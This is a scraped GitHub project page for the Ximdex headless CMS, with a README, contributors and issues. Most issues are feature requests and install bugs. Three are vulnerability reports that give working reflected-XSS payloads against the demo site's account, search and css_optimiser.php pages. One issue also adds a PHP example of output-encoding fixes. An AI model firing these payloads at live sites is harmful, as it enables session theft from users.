ximdex / xcms

Headless CMS with wysiwyg editor for XML and HTML5, omnichannel, multi-format and multi-platform decoupled publishing as html5, .net, j2ee, php, RoR, XML, json, RDF, epub, mobile apps, ... into the Cloud. Demo: http://demo.ximdex.com

Home Page: http://www.ximdex.com

License: GNU Affero General Public License v3.0

JavaScript 36.18% Shell 0.19% PHP 33.98% Smarty 5.83% CSS 12.12% XSLT 0.95% HTML 0.86% CoffeeScript 7.84% TSQL 2.06%
cms cms-framework dms semantic-web xml-editor wysiwyg-editor semantic-data html5 json-ld rdfa

xcms's Introduction

Ximdex 4.0 - README


Ximdex CMS is a Decoupled Headless Semantic Content and Data Management System (headless CMS DMS) that allows the manipulation and generation of content, data and apps to be published in different target technologies: PHP, J2EE, .NET, XML/XSLT, JS, RDF, JSON, RoR, ...

  • Description

    In fact, it is a powerful and versatile Content Management Framework (CMF) that helps you manage information in the form of data, content or services to be published in the cloud as web portals, structured semantic repositories or linked open datasets.

    With Ximdex CMS you can mix structured and non-structured content and data, represent apps and services, aggregate information from remote sources, capture metadata, annotate it with semantic tags from the visual ontology browser, add a semantic layer and publish it using Dynamic Semantic Publishing (DSP) technologies, automatically generate suggestions to enrich your content (as images, new links or references, ...), etc.

    Ximdex is modular, based on standards (XML, XSLT, RDF, HTML5, ...) and it adds a semantic layer to any managed element (doc, app, picture, metadata, video, etc.) that makes it easy to adapt information to any final exploitation format (html, rdf, j2ee, php, json, RoR, xml/xslt, …) and publish it into the cloud as web portals, semantic portals, mobile services, linked open datasets, APPs, etc.

  • Features

    • Headless CMS & Decoupled Publishing Architecture: Flexible, Secure, Scalable.
    • Neutral: content independent, format agnostic, free structure, open access, ...
    • Information adaptable, structurizable and semantizable with Dynamic Semantic Publishing (DSP) techniques
    • Multichannel in the cloud
    • Visual Edition of XML + automatic transformation of XML
    • Visual Edition of Enriched books to be generated as EPUB or APPs for iOS and Android.
    • Visual Edition of HTML5.
    • Visual Role/User/Workflow edition in an object-action UI
    • Its neutrality and flexibility allow the use of any application server or language for the deployment of portals and web applications: .NET, PHP, XML/XSLT, XHTML, HTML5, JSON, RDF, ...
    • Multiple languages, multichannel (Digital TV, Web, smartphones and tablets, APPs, ...) and multiple application servers
  • Future plans

    See our project roadmap at ROADMAP.md

  • Get Involved

    If you are interested in the power of the Semantic Web for CMS, this is a good starting point!

  • Availability

    Ximdex CMS is open source with AGPL v3 (see 'LICENSE')

  • Installation

    See 'INSTALLATION.md' for the recommended installation process.

  • Ximdex Core Requirements

    • A Unix-based system with PHP (>= 7.1, and some extra modules), Apache 2 webserver (with modules described in the installation guide) and MySQL (>= 5.7) or MariaDB (>= 10.2) database.
    • On the client side: Firefox (>= 5.0) with JavaScript and cookies enabled.
    • An internet connection if you want to use automatic recommendations (as semantic annotations) or publishing into the cloud.

xcms's People

Contributors

ajlucena78, albertodvc, alsanchez86, bliping, carlos-gn, davarresc, dimitryurbain, drzippie, edipotrebol, elenaramirez, eramirezr, jdorador, jmrodriguezximdex, jmvargas, juanpri, olea, pabletos, venespana, zaoismael

xcms's Issues

new folder name scheme

Simplification of names (for instance, ptd for transformation templates should be xsl templates or directly Transformation Templates)

Chain of actions

It would be necessary to implement a way to concatenate some actions.

Two parameters have an XSS vulnerability in the account creation page.

Vulnerability url :
http://demo.ximdex.com/xcms/index.php?action=createaccount
Vulnerability parameters:
sname,fname
payload:
fname=x"><script>alert(document.cookie)</script>//&sname=&email=&recaptcha_response_field=manual_challenge&newsletter=&enviar=Register&recaptcha_challenge_field=
fname=x&sname=x"><script>alert(document.cookie)</script>//&email=&recaptcha_response_field=manual_challenge&newsletter=&enviar=Register&recaptcha_challenge_field=
Vulnerability verification:
1, open the problematic page
2, use hackbar to simulate post submission, submit payload
3, the response page will pop up a cookie based on the inserted js code
4, using another question parameter fname, found to produce the same effect.
Repair proposal:
1, limit the input data and do not allow special characters;
2, do not trust interaction data, filter all tags

Error In Install

( ! ) Fatal error: Call to undefined function posix_getgroups() in C:\wamp\www\xi\inc\install\managers\InstallManager.class.php on line 383
Call Stack

Time Memory Function Location

1 0.0029 163680 {main}( ) ..\index.php:0
2 2.0865 9045600 InstallController->dispatch( ) ..\index.php:126
3 2.0866 9045728 InstallController->compose( ) ..\InstallController.class.php:72
4 2.0866 9045776 InstallStepFactory::getStep( ) ..\InstallController.class.php:99
5 2.0901 9059536 Ximdex\Utils\Factory->instantiate( ) ..\InstallStepFactory.class.php:74
6 2.1591 9207856 GenericInstallStep->__construct( ) ..\Factory.php:85
7 2.1688 9210992 GenericInstallStep->checkPermissions( ) ..\GenericInstallStep.class.php:44
8 2.1688 9211040 InstallManager->checkFilePermissions( ) ..\GenericInstallStep.class.php:117
9 2.1722 9212104 InstallManager->checkGroup( ) ..\InstallManager.class.php:339

Disabled PHP functions on php.ini

When the PHP disable_functions directive contains these functions:

  • pcntl_fork
  • pcntl_waitpid

the publication daemon doesn't work properly.

Twelve parameters have an XSS vulnerability in the search page.

Vulnerability url :
http://demo.ximdex.com/xfind/search
Vulnerability parameters:
filter[0][value];filter[1][value];filter[2][value];filter[3][value];filter[4][value];filter[5][value];filter[6][value];filter[7][value];filter[8][value];filter[9][value];filter[10][value];filter[11][value];filter[12][value];
payload:
javascript:alert(3294)
Vulnerability verification:
1, open the problematic page
2, use hackbar to simulate post submission, submit payload
3, the response page will pop up the set contents according to the inserted js code
4, using another question parameters found to produce the same effect.

port issues

hey there,
wanted to try this on a virtualbox with port forwarding.
So, the url for accessing ximdex on my host system is:
http://localhost:8080/ximdex

But I can't give the port to the install script. If I type it at the appropriate place, I get an error saying the URL is incorrect.
But if I specify it without URL, it breaks completely.

Any ideas?

Regards

Translate XML root element attributes

Ximdex CMS uses its own root XML element to surround every XML file that it handles. This special XML element is called docxap.

For a full translation of the code, the docxap attributes need to be translated into English. Here is the list of them and their translation candidates:

  • tipo_documento -> schema
  • idioma -> language
  • idiomas -> languages
  • canal -> channel
  • canales -> channels
  • canales_desc -> channels_desc (used?)
  • nombre_tiponodo -> nodetype-name
  • id_tiponodo -> nodetype-id
  • documento -> document-name
  • nombre_documento -> document-alias
  • proyecto -> project
  • servidor -> server

Redesigning views

There are some visual issues on grid view and table view.

  • The TH elements of the header are in a separate table from the one containing the TR. This means the column widths do not match.
  • This is inherited from the table that could reorder columns in the search engine.
  • You have to put everything in one table, or else ensure that the column widths match in the TH and TR.

Maybe the list view could be removed.

RNG Schema and XSL template samples when creating a new project

Give the user a starting RNG schema and an XSL base template (called docxap) when a new project is created in Ximdex CMS.

These new files will show some usage examples and other techniques to start developing our own RNG schemas and XSL templates.

Recognize .md files on text editor

Enable markdown support when editing common files as text. It would be necessary to add the proper mimetype to the table RelNodeTypeMimetype: text/x-markdown.

Compile docxap

To prevent Xedit from loading all the XSL templates when it opens an XML document, we propose to create a compiled file with all the XSL templates used in it.

Create a ROADMAP file

Just a very schematic brief of the product releases as they are currently planned; i.e.:

v3.4, 2nd Quarter 2013 (published May 16th, https://github.com/XIMDEX/ximdex/wiki/ximdex-3.4-released)

  • Refactoring of code to remove deprecated components
  • Update to new versions of jquery, query UD and smarty.
  • Update to PHP 5.4
  • Cache for action selector (by user, role, section, nodetype)
  • Usability: new gallery viewer for nodetype image, new contextual menu system, breadcrumbs on XML editor, ...
  • Apache Stanbol for Xowl module

v3.5, 3rd quarter 2013

  • Usability: icons as fonts, new folder creation selector to be ever less intrusive, new folder name convention, ...
  • API REST with Linked Data support (possible Hydra)
  • JS cache
  • Installer with direct download of modules

v4.0, 1st semester 2014

  • wysiwyg for XML for tablets
  • Intelligent folders (sets)
  • Themes (xlyre)
  • Decoupled repositories
  • Portal Configuration Manager
  • ...

API REST + Semantic

A REST API for selected actions (CRUD of some node types) and publishing of contents. After that, it could be of interest to provide a semantic description of the API.

Generate different URL types

Today, URLs in ximdex include the language and channel for deployment directly after the name of the document (node), generating something like index-iden-idweb.html

These URLs are automatically generated by pathto() and should be modified to conform to different URL types such as:

  • no channel there, because it is the extension of the file (option during channel creation to tick if the extension has the identifier, guaranteeing there is only one extension for that type in a server path... channel for printing the document are not relevant anymore due to css, channels in ximdex are more related to technology frameworks -java, php- and usually are deployed in different sites)
  • language appears as a folder after the project name (root of the web as www/en/index.html and www/es/index.html)
  • language appears in the filename but could be removed for the main language (so index.html for english and index-ides.html for spanish)
  • support to cue files to allow the web server to select languages

Single request on Xedit

To improve performance, a single request should be performed when editing an XML file with Xedit.

It would be a JSON object that contains the XML file, its XSL templates and its RNG schema.

Bad permits when apache tomcat is running on the same server

During the installation process, the installer script doesn't set the permits correctly if apache tomcat is running on the same server.

This means that Ximdex CMS can't write to the logs directory, and causes other critical warnings.

Workaround: from the Ximdex root path, execute the perms.sh script like this:
$> ./install/scripts/perm.sh -a

The -a stands for automatic mode.

usability: new folder creation selector

Relax the number of nodes that are automatically created (table defaultcontents) when a new node for a nodetype is created, providing a visual selector of optional nodetypes to make them selectable.

Show a warning when the URL checking fails

Now, this error is strict. The installation process stops. The solution would be to give three options: y to proceed, r to rename the host URL and n to abort the installation.

A Reflected XSS vulnerability in css_optimiser.php

Hello:
I have found a Reflected XSS vulnerability.

The vulnerability exists due to insufficient filtration of user-supplied data in the "url" HTTP parameter that will be passed to "ximdex-develop/extensions/csstidy/css_optimiser.php". The infected source code is line 139: there is no protection on $_REQUEST['url'], so if it contains evil js code, line 139 will trigger untrusted code to be executed on the browser side.

So if an attacker constructs a special URL as follows and sends it to a victim, when the victim clicks the URL, the code which is contained in the URL will be executed on the victim's browser side to do some evil.
http://your-web-root/ximdex-develop/extensions/csstidy/css_optimiser.php?url="><script>alert(1);</script><"

The following screenshot is the result of clicking the URL above (win7 sp1 x64 + firefox 51.0.1 32bit):

Discoverer: ADLab of Venustech
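
The three XSS reports on this page (fname/sname on the account page, the filter values on the search page, and url in css_optimiser.php) all come down to request data reaching HTML unencoded. The following is an added example, not code from the Ximdex project: it shows context-aware output encoding plus a URL scheme allowlist, assuming the values are echoed into quoted HTML attributes. The helper names html_attr() and safe_href() are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not part of the Ximdex code base.

/** Encode a value for an HTML text node or a quoted attribute value. */
function html_attr(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return a URL that may be placed in href/src, or '#' if its scheme is not allowed. */
function safe_href(string $url): string
{
    // Browsers ignore whitespace and control characters inside a scheme,
    // so remove them before the check and emit exactly what was checked.
    $normalized = preg_replace('/[\x00-\x20]+/', '', $url) ?? '';

    // No "scheme:" prefix means a relative URL, which is allowed.
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $normalized, $m)) {
        return $normalized;
    }
    // Allowlist instead of blocking "javascript:"; data:, vbscript: etc. fail too.
    return in_array(strtolower($m[1]), ['http', 'https'], true) ? $normalized : '#';
}

// Constructed request values, reusing the strings quoted in the reports above.
$fname = 'x"><script>alert(document.cookie)</script>//';
$link  = 'javascript:alert(3294)';

// Vulnerable pattern (kept as a comment): raw interpolation into the attribute.
// echo '<input name="fname" value="' . $fname . '">';

// Hardened pattern: encode at the point of output, for the context written into.
echo '<input name="fname" value="' . html_attr($fname) . '">', PHP_EOL;

// A URL needs both steps: scheme check first, then attribute encoding.
echo '<a href="' . html_attr(safe_href($link)) . '">result</a>', PHP_EOL;
echo '<a href="' . html_attr(safe_href('http://www.ximdex.com/?a=1&b=2')) . '">home</a>', PHP_EOL;
```

Encoding at output time keeps names such as O'Brien usable, which the "no special characters" input filter proposed in the first report would reject.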

Testing an external package manager

The idea is to find a tool able to manage external dependencies/bundles/extensions, so that they can be set explicitly in a config file and those files removed from the codebase.

Maybe bundler, maven, gradle or something similar that is able to do the job.

New Toolbox for cleaning text format

Add a new toolbox on Xedit to paste text from different sources (PDFs, ODT docs, websites, etc) and clean the implicit format elements.

Maybe a textarea would be enough for the first approach.

Cache for JS

Due to the large percentage of JavaScript code in Ximdex, a system for compacting or caching it could be of interest.
